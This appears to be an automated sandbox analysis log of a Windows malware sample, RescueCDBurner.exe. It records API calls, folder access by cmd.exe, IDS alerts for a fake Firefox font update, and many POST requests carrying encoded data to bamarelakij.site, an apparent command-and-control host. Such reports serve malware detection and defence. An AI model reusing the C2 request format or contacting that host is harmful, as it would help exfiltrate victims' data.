Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42D687 _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,3_2_6B42D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F593 _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F593
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 4x nop then or byte ptr [edi], dh3_2_6B3E7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 4x nop then push esi3_2_6B3DF680
Source: Joe Sandbox ViewIP Address: 18.244.18.27 18.244.18.27
Source: Joe Sandbox ViewIP Address: 20.42.65.85 20.42.65.85
Source: Joe Sandbox ViewIP Address: 20.110.205.119 20.110.205.119
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49872 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50073 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50111 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50113 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50115 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50118 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50117 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50114 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50119 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50112 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50120 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50116 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50121 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50122 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50123 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50124 -> 104.21.80.52:443
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 208Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201884773&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1E1e49df192553de02181e61736201885; XID=1E1e49df192553de02181e61736201885
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887861&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11511sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887865&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5103sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888101&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5380sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888863&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9879sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 106564Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 58769Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 68882Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 109611Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 58769Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 68839Host: bamarelakij.site
